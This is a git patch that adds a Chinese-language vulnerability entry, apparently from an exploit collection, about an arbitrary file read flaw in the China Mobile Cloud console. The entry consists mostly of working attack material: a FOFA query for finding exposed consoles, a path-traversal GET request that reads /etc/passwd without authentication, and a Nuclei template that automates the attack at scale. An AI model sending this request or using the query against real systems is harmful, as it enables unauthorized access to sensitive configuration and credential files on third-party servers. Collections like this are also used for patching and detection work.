From 64762d820f298db940805a40d72e40ffc3fa9f8a Mon Sep 17 00:00:00 2001
From: wy876
Date: Tue, 18 Jun 2024 15:38:12 +0800
Subject: [PATCH] =?UTF-8?q?6.18=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
中国移动云控制台存在任意文件读取.md | 50 +++++++++++++++++++++++++++++
1 file changed, 50 insertions(+)
create mode 100644 中国移动云控制台存在任意文件读取.md
diff --git a/中国移动云控制台存在任意文件读取.md b/中国移动云控制台存在任意文件读取.md
new file mode 100644
index 0000000..f1e6d6c
--- /dev/null
+++ b/中国移动云控制台存在任意文件读取.md
@@ -0,0 +1,50 @@
+## 中国移动云控制台存在任意文件读取
+
+中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息
+
+## fofa
+
+```
+body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
+```
+
+## poc
+
+```
+GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
+Host: ip
+```
+
+![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)
+
+
+
+## Yaml
+
+```
+id: cmecloud-console-readfile
+
+info:
+ name: 移动云控制台存在任意文件读取
+ author: onewin
+ severity: high
+ description: 移动云控制台存在任意文件读取
+
+http:
+- raw:
+ - |+
+ @timeout: 30s
+ GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "root"
+ part: body
+```
+